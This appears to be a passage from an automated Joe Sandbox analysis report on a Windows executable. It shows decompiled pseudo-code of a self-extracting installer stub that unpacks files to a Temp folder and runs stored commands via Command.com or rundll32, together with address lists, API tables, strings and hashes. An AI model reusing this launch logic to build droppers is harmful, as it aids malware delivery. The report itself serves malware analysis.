                                                								if((_t118 & 0x00000001) == 0) {
                                                									__eflags = _t118 & 0x00000002;
                                                									if((_t118 & 0x00000002) == 0) {
                                                										goto L62;
                                                									}
                                                									_t140 = "USRQCMD";
                                                									L20:
                                                									_t146 =  &_v276;
                                                									if(E002F468F(_t140,  &_v276, 0x104) == 0) {
                                                										goto L25;
                                                									}
                                                									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                										_t153 = 1;
                                                										_v388 = 1;
                                                									}
                                                									goto L23;
                                                								}
                                                								_t140 = "ADMQCMD";
                                                								goto L20;
                                                							}
                                                						}
                                                						L26:
                                                						_push(_t130);
                                                						_t146 = 0x104;
                                                						E002F1781( &_v276, 0x104, _t130, 0x2f8c42);
                                                						goto L27;
                                                					}
                                                				}
                                                				_t130 = "REBOOT";
                                                				_t125 = E002F468F(_t130, 0x2f9a2c, 4);
                                                				if(_t125 == 0 || _t125 > 4) {
                                                					goto L25;
                                                				} else {
                                                					goto L3;
                                                				}
                                                			}





























































                                                0x002f3baa
                                                0x002f3bb0
                                                0x002f3bb7
                                                0x002f3bc0
                                                0x002f3bc2
                                                0x002f3bc9
                                                0x002f3bcb
                                                0x002f3bcf
                                                0x002f3bd3
                                                0x002f3bd9
                                                0x002f3bfd
                                                0x002f3bfd
                                                0x002f3bff
                                                0x002f3c03
                                                0x002f3c03
                                                0x002f3c11
                                                0x002f3c16
                                                0x002f3c19
                                                0x002f3c28
                                                0x00000000
                                                0x00000000
                                                0x002f3c30
                                                0x002f3c39
                                                0x002f3c40
                                                0x002f3d13
                                                0x002f3d15
                                                0x002f3d21
                                                0x002f3d26
                                                0x00000000
                                                0x002f3c4f
                                                0x002f3c56
                                                0x002f3c60
                                                0x002f3c65
                                                0x002f3c77
                                                0x002f3c78
                                                0x002f3c7c
                                                0x002f3c7e
                                                0x002f3c82
                                                0x002f3c82
                                                0x00000000
                                                0x002f3c7c
                                                0x002f3c67
                                                0x002f3c69
                                                0x002f3c6d
                                                0x00000000
                                                0x002f3c58
                                                0x002f3c58
                                                0x002f3c6e
                                                0x002f3c6e
                                                0x002f3c87
                                                0x002f3c89
                                                0x002f3d4d
                                                0x002f3d4f
                                                0x002f3d50
                                                0x002f3d52
                                                0x002f3d9e
                                                0x002f3da8
                                                0x002f3daf
                                                0x002f3db4
                                                0x002f3db6
                                                0x002f3f4d
                                                0x002f3f4d
                                                0x002f3f4f
                                                0x002f3f56
                                                0x002f3f57
                                                0x002f3f58
                                                0x002f3f63
                                                0x002f3f63
                                                0x002f3dbc
                                                0x002f3dc0
                                                0x002f3dc2
                                                0x002f3de6
                                                0x002f3de6
                                                0x002f3de8
                                                0x002f3f0b
                                                0x002f3f0b
                                                0x002f3f0f
                                                0x002f3f13
                                                0x002f3f15
                                                0x002f3f1a
                                                0x002f3f1c
                                                0x002f3f46
                                                0x002f3f47
                                                0x00000000
                                                0x002f3f47
                                                0x002f3f1e
                                                0x002f3f1f
                                                0x002f3f25
                                                0x002f3f26
                                                0x002f3f2a
                                                0x002f3f2d
                                                0x002f3fd9
                                                0x002f3fd9
                                                0x002f3fda
                                                0x002f3fda
                                                0x002f3fe1
                                                0x002f3fe3
                                                0x002f3fe3
                                                0x002f3fe8
                                                0x00000000
                                                0x002f3fe8
                                                0x002f3f33
                                                0x002f3f37
                                                0x00000000
                                                0x002f3f37
                                                0x002f3dee
                                                0x002f3dee
                                                0x002f3df5
                                                0x002f3fad
                                                0x002f3fb9
                                                0x002f3fc2
                                                0x002f3fc8
                                                0x00000000
                                                0x002f3fc8
                                                0x002f3dfb
                                                0x002f3dfd
                                                0x00000000
                                                0x00000000
                                                0x002f3e03
                                                0x002f3e0a
                                                0x00000000
                                                0x00000000
                                                0x002f3e15
                                                0x002f3e17
                                                0x002f3e19
                                                0x002f3f94
                                                0x002f3fa4
                                                0x002f3f7c
                                                0x002f3f80
                                                0x002f3f8b
                                                0x00000000
                                                0x002f3f8b
                                                0x002f3e2c
                                                0x002f3e30
                                                0x002f3e34
                                                0x002f3e36
                                                0x002f3f69
                                                0x002f3f6e
                                                0x002f3f70
                                                0x002f3f76
                                                0x00000000
                                                0x002f3f76
                                                0x002f3e3c
                                                0x002f3e43
                                                0x002f3e47
                                                0x002f3e52
                                                0x002f3e56
                                                0x002f3e5c
                                                0x002f3e61
                                                0x002f3e68
                                                0x002f3e70
                                                0x002f3e74
                                                0x002f3e7c
                                                0x002f3e80
                                                0x002f3e82
                                                0x002f3e82
                                                0x002f3e87
                                                0x002f3e87
                                                0x002f3e8b
                                                0x002f3e91
                                                0x002f3e94
                                                0x002f3e96
                                                0x002f3e96
                                                0x002f3e9b
                                                0x002f3e9b
                                                0x002f3e9f
                                                0x002f3ea2
                                                0x002f3ea4
                                                0x002f3ea4
                                                0x002f3ea9
                                                0x002f3ea9
                                                0x002f3ead
                                                0x002f3eb3
                                                0x002f3eb6
                                                0x002f3eb8
                                                0x002f3eb8
                                                0x002f3ebd
                                                0x002f3ebd
                                                0x002f3ec1
                                                0x002f3ec3
                                                0x002f3ec5
                                                0x002f3ec5
                                                0x002f3eca
                                                0x002f3eca
                                                0x002f3ece
                                                0x002f3ed5
                                                0x002f3ed9
                                                0x002f3ee0
                                                0x002f3ee6
                                                0x002f3eea
                                                0x002f3eec
                                                0x002f3eee
                                                0x002f3ef3
                                                0x002f3ef3
                                                0x002f3ef5
                                                0x002f3efa
                                                0x002f3efb
                                                0x002f3efd
                                                0x002f3f40
                                                0x00000000
                                                0x002f3eff
                                                0x002f3eff
                                                0x002f3f05
                                                0x00000000
                                                0x002f3f05
                                                0x002f3efd
                                                0x002f3dc7
                                                0x002f3dce
                                                0x00000000
                                                0x00000000
                                                0x002f3dd0
                                                0x002f3dd7
                                                0x00000000
                                                0x00000000
                                                0x002f3dd9
                                                0x002f3ddb
                                                0x00000000
                                                0x00000000
                                                0x002f3ddd
                                                0x002f3de1
                                                0x00000000
                                                0x002f3de1
                                                0x002f3d59
                                                0x002f3d65
                                                0x002f3d6a
                                                0x002f3d6c
                                                0x00000000
                                                0x00000000
                                                0x002f3d6e
                                                0x002f3d75
                                                0x00000000
                                                0x00000000
                                                0x002f3d8f
                                                0x002f3d96
                                                0x002f3d98
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f3d98
                                                0x002f3c8f
                                                0x002f3c98
                                                0x002f3cf1
                                                0x002f3cf3
                                                0x00000000
                                                0x00000000
                                                0x002f3cfe
                                                0x002f3d11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f3d11
                                                0x002f3c9c
                                                0x002f3ca5
                                                0x002f3ca7
                                                0x00000000
                                                0x00000000
                                                0x002f3cad
                                                0x002f3cb2
                                                0x002f3cb7
                                                0x002f3cc5
                                                0x00000000
                                                0x00000000
                                                0x002f3ce8
                                                0x002f3cec
                                                0x002f3ced
                                                0x002f3ced
                                                0x00000000
                                                0x002f3ce8
                                                0x002f3c9e
                                                0x00000000
                                                0x002f3c9e
                                                0x002f3c56
                                                0x002f3d35
                                                0x002f3d35
                                                0x002f3d3c
                                                0x002f3d48
                                                0x00000000
                                                0x002f3d48
                                                0x002f3c03
                                                0x002f3be2
                                                0x002f3be7
                                                0x002f3bee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • memset.MSVCRT ref: 002F3C11
                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 002F3CDC
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
                                                  • Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
                                                  • Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
                                                  • Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
                                                  • Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
                                                  • Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF
                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,002F8C42), ref: 002F3D8F
                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 002F3E26
                                                • FreeLibrary.KERNEL32(00000000,?,002F8C42), ref: 002F3EFF
                                                • LocalFree.KERNEL32(?,?,?,?,002F8C42), ref: 002F3F1F
                                                • FreeLibrary.KERNEL32(00000000,?,002F8C42), ref: 002F3F40
                                                • LocalFree.KERNEL32(?,?,?,?,002F8C42), ref: 002F3F47
                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,002F8C42), ref: 002F3F76
                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,002F8C42), ref: 002F3F80
                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,002F8C42), ref: 002F3FC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lega
                                                • API String ID: 1032054927-3474760064
                                                • Opcode ID: b64bd4f55be0325e33c1af09d02b64250c26fc7eff2ddf7ce575e5525d5f56ec
                                                • Instruction ID: aee299b8820d0aae687137d78b6fc0b16542d047a5f6710b9de3c23db2c07198
                                                • Opcode Fuzzy Hash: b64bd4f55be0325e33c1af09d02b64250c26fc7eff2ddf7ce575e5525d5f56ec
                                                • Instruction Fuzzy Hash: D3B1C47052430A9BE720DF24D949B7BF6E4EB857E0F100A3EFB89D6190DB718964CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 2f1ae8-2f1b2c call 2f1680 144 2f1b2e-2f1b39 141->144 145 2f1b3b-2f1b40 141->145 146 2f1b46-2f1b61 call 2f1a84 144->146 145->146 149 2f1b9f-2f1bc2 call 2f1781 call 2f658a 146->149 150 2f1b63-2f1b65 146->150 157 2f1bc7-2f1bd3 call 2f66c8 149->157 152 2f1b68-2f1b6d 150->152 152->152 154 2f1b6f-2f1b74 152->154 154->149 156 2f1b76-2f1b7b 154->156 158 2f1b7d-2f1b81 156->158 159 2f1b83-2f1b86 156->159 166 2f1bd9-2f1bf1 CompareStringA 157->166 167 2f1d73-2f1d7f call 2f66c8 157->167 158->159 161 2f1b8c-2f1b9d call 2f1680 158->161 159->149 162 2f1b88-2f1b8a 159->162 161->157 162->149 162->161 166->167 168 2f1bf7-2f1c07 GetFileAttributesA 166->168 175 2f1df8-2f1e09 LocalAlloc 167->175 176 2f1d81-2f1d99 CompareStringA 167->176 170 2f1c0d-2f1c15 168->170 171 2f1d53-2f1d5e 168->171 170->171 174 2f1c1b-2f1c33 call 2f1a84 170->174 173 2f1d64-2f1d6e call 2f44b9 171->173 191 2f1e94-2f1ea4 call 2f6ce0 173->191 187 2f1c35-2f1c38 174->187 188 2f1c50-2f1c61 LocalAlloc 174->188 178 2f1e0b-2f1e1b GetFileAttributesA 175->178 179 2f1dd4-2f1ddf 175->179 176->175 181 2f1d9b-2f1da2 176->181 184 2f1e1d-2f1e1f 178->184 185 2f1e67-2f1e73 call 2f1680 178->185 179->173 182 2f1da5-2f1daa 181->182 182->182 189 2f1dac-2f1db4 182->189 184->185 192 2f1e21-2f1e3e call 2f1781 184->192 197 2f1e78-2f1e84 call 2f2aac 185->197 193 2f1c3a 187->193 194 2f1c40-2f1c4b call 2f1a84 187->194 188->179 196 2f1c67-2f1c72 188->196 195 2f1db7-2f1dbc 189->195 192->197 211 2f1e40-2f1e43 192->211 193->194 194->188 195->195 201 2f1dbe-2f1dd2 LocalAlloc 195->201 202 2f1c79-2f1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->202 203 2f1c74 196->203 210 2f1e89-2f1e92 197->210 201->179 207 2f1de1-2f1df3 call 2f171e 201->207 208 2f1cf8-2f1d07 202->208 209 2f1cc2-2f1ccc 202->209 203->202 207->210 212 2f1d09-2f1d21 GetShortPathNameA 208->212 213 2f1d23 208->213 215 2f1cce 209->215 216 2f1cd3-2f1cf3 call 2f1680 * 2 209->216 210->191 211->197 217 2f1e45-2f1e65 call 2f16b3 * 2 211->217 219 2f1d28-2f1d2b 212->219 213->219 215->216 216->210 217->197 223 2f1d2d 219->223 224 2f1d32-2f1d4e call 2f171e 219->224 223->224 224->210
                                                C-Code - Quality: 82%
                                                			E002F1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v527;
                                                				char _v528;
                                                				char _v1552;
                                                				CHAR* _v1556;
                                                				int* _v1560;
                                                				CHAR** _v1564;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t48;
                                                				CHAR* _t53;
                                                				CHAR* _t54;
                                                				char* _t57;
                                                				char* _t58;
                                                				CHAR* _t60;
                                                				void* _t62;
                                                				signed char _t65;
                                                				intOrPtr _t76;
                                                				intOrPtr _t77;
                                                				unsigned int _t85;
                                                				CHAR* _t90;
                                                				CHAR* _t92;
                                                				char _t105;
                                                				char _t106;
                                                				CHAR** _t111;
                                                				CHAR* _t115;
                                                				intOrPtr* _t125;
                                                				void* _t126;
                                                				CHAR* _t132;
                                                				CHAR* _t135;
                                                				void* _t138;
                                                				void* _t139;
                                                				void* _t145;
                                                				intOrPtr* _t146;
                                                				char* _t148;
                                                				CHAR* _t151;
                                                				void* _t152;
                                                				CHAR* _t155;
                                                				CHAR* _t156;
                                                				void* _t157;
                                                				signed int _t158;
                                                
                                                				_t48 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t48 ^ _t158;
                                                				_t108 = __ecx;
                                                				_v1564 = _a4;
                                                				_v1560 = _a8;
                                                				E002F1680( &_v528, 0x104, __ecx);
                                                				if(_v528 != 0x22) {
                                                					_t135 = " ";
                                                					_t53 =  &_v528;
                                                				} else {
                                                					_t135 = "\"";
                                                					_t53 =  &_v527;
                                                				}
                                                				_t111 =  &_v1556;
                                                				_v1556 = _t53;
                                                				_t54 = E002F1A84(_t111, _t135);
                                                				_t156 = _v1556;
                                                				_t151 = _t54;
                                                				if(_t156 == 0) {
                                                					L12:
                                                					_push(_t111);
                                                					E002F1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                					E002F658A( &_v268, 0x104, _t156);
                                                					goto L13;
                                                				} else {
                                                					_t132 = _t156;
                                                					_t148 =  &(_t132[1]);
                                                					do {
                                                						_t105 =  *_t132;
                                                						_t132 =  &(_t132[1]);
                                                					} while (_t105 != 0);
                                                					_t111 = _t132 - _t148;
                                                					if(_t111 < 3) {
                                                						goto L12;
                                                					}
                                                					_t106 = _t156[1];
                                                					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                							goto L12;
                                                						} else {
                                                							goto L11;
                                                						}
                                                					} else {
                                                						L11:
                                                						E002F1680( &_v268, 0x104, _t156);
                                                						L13:
                                                						_t138 = 0x2e;
                                                						_t57 = E002F66C8(_t156, _t138);
                                                						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                							_t139 = 0x2e;
                                                							_t115 = _t156;
                                                							_t58 = E002F66C8(_t115, _t139);
                                                							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                								_t156 = LocalAlloc(0x40, 0x400);
                                                								if(_t156 == 0) {
                                                									goto L43;
                                                								}
                                                								_t65 = GetFileAttributesA( &_v268); // executed
                                                								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                									E002F1680( &_v1552, 0x400, _t108);
                                                								} else {
                                                									_push(_t115);
                                                									_t108 = 0x400;
                                                									E002F1781( &_v1552, 0x400, _t115,  &_v268);
                                                									if(_t151 != 0 &&  *_t151 != 0) {
                                                										E002F16B3( &_v1552, 0x400, " ");
                                                										E002F16B3( &_v1552, 0x400, _t151);
                                                									}
                                                								}
                                                								_t140 = _t156;
                                                								 *_t156 = 0;
                                                								E002F2AAC( &_v1552, _t156, _t156);
                                                								goto L53;
                                                							} else {
                                                								_t108 = "Command.com /c %s";
                                                								_t125 = "Command.com /c %s";
                                                								_t145 = _t125 + 1;
                                                								do {
                                                									_t76 =  *_t125;
                                                									_t125 = _t125 + 1;
                                                								} while (_t76 != 0);
                                                								_t126 = _t125 - _t145;
                                                								_t146 =  &_v268;
                                                								_t157 = _t146 + 1;
                                                								do {
                                                									_t77 =  *_t146;
                                                									_t146 = _t146 + 1;
                                                								} while (_t77 != 0);
                                                								_t140 = _t146 - _t157;
                                                								_t154 = _t126 + 8 + _t146 - _t157;
                                                								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                								if(_t156 != 0) {
                                                									E002F171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                									goto L53;
                                                								}
                                                								goto L43;
                                                							}
                                                						} else {
                                                							_t85 = GetFileAttributesA( &_v268);
                                                							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                								_t140 = 0x525;
                                                								_push(0);
                                                								_push(0x10);
                                                								_push(0);
                                                								_t60 =  &_v268;
                                                								goto L35;
                                                							} else {
                                                								_t140 = "[";
                                                								_v1556 = _t151;
                                                								_t90 = E002F1A84( &_v1556, "[");
                                                								if(_t90 != 0) {
                                                									if( *_t90 != 0) {
                                                										_v1556 = _t90;
                                                									}
                                                									_t140 = "]";
                                                									E002F1A84( &_v1556, "]");
                                                								}
                                                								_t156 = LocalAlloc(0x40, 0x200);
                                                								if(_t156 == 0) {
                                                									L43:
                                                									_t60 = 0;
                                                									_t140 = 0x4b5;
                                                									_push(0);
                                                									_push(0x10);
                                                									_push(0);
                                                									L35:
                                                									_push(_t60);
                                                									E002F44B9(0, _t140);
                                                									_t62 = 0;
                                                									goto L54;
                                                								} else {
                                                									_t155 = _v1556;
                                                									_t92 = _t155;
                                                									if( *_t155 == 0) {
                                                										_t92 = "DefaultInstall";
                                                									}
                                                									 *0x2f9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                									 *_v1560 = 1;
                                                									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x2f1140, _t156, 8,  &_v268) == 0) {
                                                										 *0x2f9a34 =  *0x2f9a34 & 0xfffffffb;
                                                										if( *0x2f9a40 != 0) {
                                                											_t108 = "setupapi.dll";
                                                										} else {
                                                											_t108 = "setupx.dll";
                                                											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                										}
                                                										if( *_t155 == 0) {
                                                											_t155 = "DefaultInstall";
                                                										}
                                                										_push( &_v268);
                                                										_push(_t155);
                                                										E002F171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                									} else {
                                                										 *0x2f9a34 =  *0x2f9a34 | 0x00000004;
                                                										if( *_t155 == 0) {
                                                											_t155 = "DefaultInstall";
                                                										}
                                                										E002F1680(_t108, 0x104, _t155);
                                                										_t140 = 0x200;
                                                										E002F1680(_t156, 0x200,  &_v268);
                                                									}
                                                									L53:
                                                									_t62 = 1;
                                                									 *_v1564 = _t156;
                                                									L54:
                                                									_pop(_t152);
                                                									return E002F6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}














































                                                0x002f1af3
                                                0x002f1afa
                                                0x002f1b07
                                                0x002f1b09
                                                0x002f1b1a
                                                0x002f1b20
                                                0x002f1b2c
                                                0x002f1b3b
                                                0x002f1b40
                                                0x002f1b2e
                                                0x002f1b2e
                                                0x002f1b33
                                                0x002f1b33
                                                0x002f1b46
                                                0x002f1b4c
                                                0x002f1b52
                                                0x002f1b57
                                                0x002f1b5d
                                                0x002f1b61
                                                0x002f1b9f
                                                0x002f1b9f
                                                0x002f1bb1
                                                0x002f1bc2
                                                0x00000000
                                                0x002f1b63
                                                0x002f1b63
                                                0x002f1b65
                                                0x002f1b68
                                                0x002f1b68
                                                0x002f1b6a
                                                0x002f1b6b
                                                0x002f1b6f
                                                0x002f1b74
                                                0x00000000
                                                0x00000000
                                                0x002f1b76
                                                0x002f1b7b
                                                0x002f1b86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f1b8c
                                                0x002f1b8c
                                                0x002f1b98
                                                0x002f1bc7
                                                0x002f1bc9
                                                0x002f1bcc
                                                0x002f1bd3
                                                0x002f1d75
                                                0x002f1d76
                                                0x002f1d78
                                                0x002f1d7f
                                                0x002f1e05
                                                0x002f1e09
                                                0x00000000
                                                0x00000000
                                                0x002f1e12
                                                0x002f1e1b
                                                0x002f1e73
                                                0x002f1e21
                                                0x002f1e21
                                                0x002f1e28
                                                0x002f1e37
                                                0x002f1e3e
                                                0x002f1e52
                                                0x002f1e60
                                                0x002f1e60
                                                0x002f1e3e
                                                0x002f1e79
                                                0x002f1e7b
                                                0x002f1e84
                                                0x00000000
                                                0x002f1d9b
                                                0x002f1d9b
                                                0x002f1da0
                                                0x002f1da2
                                                0x002f1da5
                                                0x002f1da5
                                                0x002f1da7
                                                0x002f1da8
                                                0x002f1dac
                                                0x002f1dae
                                                0x002f1db4
                                                0x002f1db7
                                                0x002f1db7
                                                0x002f1db9
                                                0x002f1dba
                                                0x002f1dbe
                                                0x002f1dc3
                                                0x002f1dce
                                                0x002f1dd2
                                                0x002f1deb
                                                0x00000000
                                                0x002f1df0
                                                0x00000000
                                                0x002f1dd2
                                                0x002f1bf7
                                                0x002f1bfe
                                                0x002f1c07
                                                0x002f1d55
                                                0x002f1d5a
                                                0x002f1d5b
                                                0x002f1d5d
                                                0x002f1d5e
                                                0x00000000
                                                0x002f1c1b
                                                0x002f1c1b
                                                0x002f1c20
                                                0x002f1c2c
                                                0x002f1c33
                                                0x002f1c38
                                                0x002f1c3a
                                                0x002f1c3a
                                                0x002f1c40
                                                0x002f1c4b
                                                0x002f1c4b
                                                0x002f1c5d
                                                0x002f1c61
                                                0x002f1dd4
                                                0x002f1dd4
                                                0x002f1dd6
                                                0x002f1ddb
                                                0x002f1ddc
                                                0x002f1dde
                                                0x002f1d64
                                                0x002f1d64
                                                0x002f1d67
                                                0x002f1d6c
                                                0x00000000
                                                0x002f1c67
                                                0x002f1c67
                                                0x002f1c6d
                                                0x002f1c72
                                                0x002f1c74
                                                0x002f1c74
                                                0x002f1c8e
                                                0x002f1c99
                                                0x002f1cc0
                                                0x002f1cf8
                                                0x002f1d07
                                                0x002f1d23
                                                0x002f1d09
                                                0x002f1d14
                                                0x002f1d1b
                                                0x002f1d1b
                                                0x002f1d2b
                                                0x002f1d2d
                                                0x002f1d2d
                                                0x002f1d38
                                                0x002f1d39
                                                0x002f1d46
                                                0x002f1cc2
                                                0x002f1cc2
                                                0x002f1ccc
                                                0x002f1cce
                                                0x002f1cce
                                                0x002f1cdb
                                                0x002f1ce6
                                                0x002f1cee
                                                0x002f1cee
                                                0x002f1e89
                                                0x002f1e91
                                                0x002f1e92
                                                0x002f1e94
                                                0x002f1e97
                                                0x002f1ea4
                                                0x002f1ea4
                                                0x002f1c61
                                                0x002f1c07
                                                0x002f1bd3
                                                0x002f1b7b

                                                APIs
                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 002F1BE7
                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 002F1BFE
                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 002F1C57
                                                • GetPrivateProfileIntA.KERNEL32 ref: 002F1C88
                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,002F1140,00000000,00000008,?), ref: 002F1CB8
                                                • GetShortPathNameA.KERNEL32 ref: 002F1D1B
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                • API String ID: 383838535-506080820
                                                • Opcode ID: e2efa9c3e24b499280ad5b193684502c14699435889f2f7e36e47bd17f91920d
                                                • Instruction ID: 5817a00a8ac98c1542d80d346f6f3123114462d67015af54fc8998837b5cf2ce
                                                • Opcode Fuzzy Hash: e2efa9c3e24b499280ad5b193684502c14699435889f2f7e36e47bd17f91920d
                                                • Instruction Fuzzy Hash: 75A10470A2021DDBEB209F24DC44FFAF7699B513A0F9402B5E759A32C1DBB09DB5CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 2f2f1d-2f2f3d 407 2f2f3f-2f2f46 406->407 408 2f2f6c-2f2f73 call 2f5164 406->408 410 2f2f5f-2f2f66 call 2f3a3f 407->410 411 2f2f48 call 2f51e5 407->411 417 2f2f79-2f2f80 call 2f55a0 408->417 418 2f3041 408->418 410->408 410->418 415 2f2f4d-2f2f4f 411->415 415->418 420 2f2f55-2f2f5d 415->420 417->418 425 2f2f86-2f2fbe GetSystemDirectoryA call 2f658a LoadLibraryA 417->425 419 2f3043-2f3053 call 2f6ce0 418->419 420->408 420->410 428 2f2ff7-2f3004 FreeLibrary 425->428 429 2f2fc0-2f2fd4 GetProcAddress 425->429 431 2f3017-2f3024 SetCurrentDirectoryA 428->431 432 2f3006-2f300c 428->432 429->428 430 2f2fd6-2f2fee DecryptFileA 429->430 430->428 441 2f2ff0-2f2ff5 430->441 434 2f3026-2f303c call 2f44b9 call 2f6285 431->434 435 2f3054-2f305a 431->435 432->431 433 2f300e call 2f621e 432->433 445 2f3013-2f3015 433->445 434->418 437 2f305c call 2f3b26 435->437 438 2f3065-2f306c 435->438 447 2f3061-2f3063 437->447 443 2f306e-2f3075 call 2f256d 438->443 444 2f307c-2f3089 438->444 441->428 454 2f307a 443->454 449 2f308b-2f3091 444->449 450 2f30a1-2f30a9 444->450 445->418 445->431 447->418 447->438 449->450 455 2f3093 call 2f3ba2 449->455 452 2f30ab-2f30ad 450->452 453 2f30b4-2f30b7 450->453 452->453 457 2f30af call 2f4169 452->457 453->419 454->444 460 2f3098-2f309a 455->460 457->453 460->418 461 2f309c 460->461 461->450
                                                C-Code - Quality: 82%
                                                			E002F2F1D(void* __ecx, int __edx) {
                                                				signed int _v8;
                                                				char _v272;
                                                				_Unknown_base(*)()* _v276;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t9;
                                                				void* _t11;
                                                				struct HWND__* _t12;
                                                				void* _t14;
                                                				int _t21;
                                                				signed int _t22;
                                                				signed int _t25;
                                                				intOrPtr* _t26;
                                                				signed int _t27;
                                                				void* _t30;
                                                				_Unknown_base(*)()* _t31;
                                                				void* _t34;
                                                				struct HINSTANCE__* _t36;
                                                				intOrPtr _t41;
                                                				intOrPtr* _t44;
                                                				signed int _t46;
                                                				int _t47;
                                                				void* _t58;
                                                				void* _t59;
                                                
                                                				_t43 = __edx;
